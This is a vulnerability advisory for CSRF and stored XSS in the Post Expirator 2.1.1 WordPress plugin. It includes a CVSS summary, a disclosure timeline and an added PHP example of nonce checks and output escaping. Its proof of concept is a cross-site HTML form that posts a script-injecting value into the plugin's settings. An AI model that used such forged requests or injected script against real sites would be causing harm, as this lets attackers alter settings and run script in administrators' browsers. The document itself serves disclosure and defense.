Advisory: CSRF and XSS in Post Expirator 2.1.1

Vulnerability

A lack of output escaping and of safe request processing on the plugin's settings page allows CSRF and XSS: an attacker-controlled form submission can change a setting, and the stored value is later rendered without escaping.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability:

  • Score: 7.5 (High)
  • Access vector: Network
  • Access complexity: Low
  • Authentication: None
  • Confidentiality impact: Partial
  • Integrity impact: Partial
  • Availability impact: Partial
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

<form method="POST" action="http://localhost/wp-admin/options-general.php?page=post-expirator.php">
  <input type="text" name="expired-default-date-format" value="&quot;>&lt;script>alert(1)&lt;/script>">
  <input type="text" name="expirationdateSave" value="kthxbai">
  <input type="submit">
</form>
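The two defects behind this proof of concept are a settings handler that accepts any POST and a form that echoes the stored value unescaped. The following is an added illustration of how such a WordPress settings page is hardened; it is not the plugin's own code, and the option name and nonce action are assumed placeholders.

```php
<?php
// Added illustration, not the plugin's code: a hardened settings handler for a
// page like options-general.php?page=post-expirator.php. The request parameter
// names match the advisory's PoC; the option name and nonce action are assumed.

define( 'PE_NONCE_ACTION', 'postexpirator_save_settings' );          // assumed
define( 'PE_OPTION_DATE_FORMAT', 'postexpirator_default_date_format' ); // assumed

function pe_handle_settings_save() {
    // Only react to our own submit button.
    if ( ! isset( $_POST['expirationdateSave'] ) ) {
        return;
    }
    // 1. Authorization: the request must come from a user allowed to change options.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // 2. CSRF: the request must carry a nonce tied to this action and this user.
    //    A cross-site form like the PoC cannot supply it, so the request dies here.
    check_admin_referer( PE_NONCE_ACTION );

    // 3. Input handling: unslash and sanitize before storing.
    $format = isset( $_POST['expired-default-date-format'] )
        ? sanitize_text_field( wp_unslash( $_POST['expired-default-date-format'] ) )
        : '';
    update_option( PE_OPTION_DATE_FORMAT, $format );
}

function pe_render_settings_form() {
    $format = get_option( PE_OPTION_DATE_FORMAT, 'Y-m-d' );
    ?>
    <form method="post"
          action="<?php echo esc_url( admin_url( 'options-general.php?page=post-expirator.php' ) ); ?>">
        <?php wp_nonce_field( PE_NONCE_ACTION ); ?>
        <!-- 4. Output escaping: a stored value such as "><script>... is rendered
             as attribute text, not as markup, because esc_attr() encodes it. -->
        <input type="text" name="expired-default-date-format"
               value="<?php echo esc_attr( $format ); ?>">
        <input type="submit" name="expirationdateSave" value="Save">
    </form>
    <?php
}

add_action( 'admin_init', 'pe_handle_settings_save' );
```

With the nonce check in place the PoC form fails before any option is written, and even a value stored by other means is neutralised at output by esc_attr().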

Advisory timeline

  • 2013-12-18 Discovered
  • 2014-02-18 Reported to plugins@wordpress.org
  • 2014-03-17 Updated version has appeared on the codex, which reports the issue as fixed.

Mitigation/further actions

Upgrade immediately.